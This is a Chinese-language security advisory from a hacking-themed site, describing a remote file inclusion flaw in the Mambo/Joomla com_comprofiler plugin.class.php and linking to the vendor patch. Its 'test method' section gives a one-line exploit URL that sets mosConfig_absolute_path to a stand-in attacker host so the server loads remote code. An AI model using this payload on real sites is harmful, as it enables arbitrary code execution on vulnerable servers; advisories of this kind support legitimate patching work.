我爱黑客网首页 设为首页
加入收藏
联系我们
 首 页  技术文章 下载中心 站长学院 交流论坛
 软件:
 文章:        教程:
 推荐: 我爱黑客网论坛
 
 
 
 
   
黑软: Q Q 软件 木马间谍 探嗅监听 溢出攻击 加密解密 漏洞扫描 脚本注入 远程控制 综合利用 聊天工具  
 
技术文章: 爱黑新闻 | 黑客攻防 | 网络技术 | 程序设计 | 系统操作 | 本站动态 | 业界动态 | 安全公告 | 病毒公告 | 八卦黑客
 
 
您当前的位置:我爱黑客 -> 爱黑新闻 -> 安全公告 -> 文章内容  
栏目导航
· 本站动态 · 病毒公告
· 业界动态 · 安全公告
· 八卦黑客
热门文章
· 17173注入漏洞
· Windows 2000出现重大..
· 微软又有麻烦 瑞士人1..
· 微软发Windows安全补丁..
· 入侵检测系统“Snort”..
· 全陷入瘫痪状态 丹东..
· Web服务中的安全规范
· 视窗出三处漏洞 其中一..
· Apache HTTP服务器多个..
· 甲骨文发现两个安全漏..
· Windows发现最严重漏洞..
· 瑞星公司07月07日发布..
相关文章

· Mac版Office 2004升..
· 在线欺诈团伙瞄准Ma..
· iAdware:Mac也有恶..
· 得到远程机器MAC地址..
· C++Builder调用Matl..
· 用Foxmail的地址传播..
· 仿FDISK及PQMAGIC列..
· 仿FDISK及PQMAGIC列..
· FlashChat多个远程文..
· Google已经修补Gmai..
查看更多与Mambo/Joomla plugin.class.php脚本远程文件包含漏洞相关内容

Mambo/Joomla plugin.class.php脚本远程文件包含漏洞
作者:幽火  来源:www.5ihack.com  发布时间:2007-1-8 8:56:38  发布人:ghostfire

减小字体 增大字体

受影响系统:
Mambo com_comprofiler <= 1.0 RC2
不受影响系统:
Mambo com_comprofiler 1.0.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 19725

Mambo(也被称为Joomla)是一款开放源代码的WEB内容管理系统。

Mambo在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞服务器上以Web进程权限执行任意命令。

在Mambo的com_comprofiler文件夹的plugin.class.php脚本中:

-----------------------plugin.class.php----------------------
<?php
/**
* Plugin handler
* @package Joomla
* @author various, JoomlaJoe and Beat
*/

require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' \
);

----------------------------------------------------------

由于没有正确的过滤$mosConfig_absolute_path变量,导致了远程文件包含漏洞。攻击者可以利用这个漏洞执行任意代码。

<*来源:Matdhule (matdhule@gmail.com
 
  链接:http://secunia.com/advisories/21636/
        http://marc.theaimsgroup.com/?l=bugtraq&m=115661101703390&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= http://attacker.com/evil.txt?

建议:
--------------------------------------------------------------------------------
厂商补丁:

Mambo
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.joomlapolis.com/component/option,com_docman/task,cat_view/gid,46/Itemid,36/

查看更多与Mambo/Joomla plugin.class.php脚本远程文件包含漏洞相关内容

[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:
下一篇文章:
      FlashChat多个远程文件包含漏洞       病毒借浏览器漏洞肆虐 瑞星紧急提供IE保护
∷相关文章评论∷   (评论内容只代表网友观点,与本站立场无关!) [发表评论]
 
 
 
 
晋ICP备05008232   维护网络安全、传播安全技术才是我们的目标! 
 
关于本站 - 网站帮助 - - 下载声明 - 友情连接 -网站地图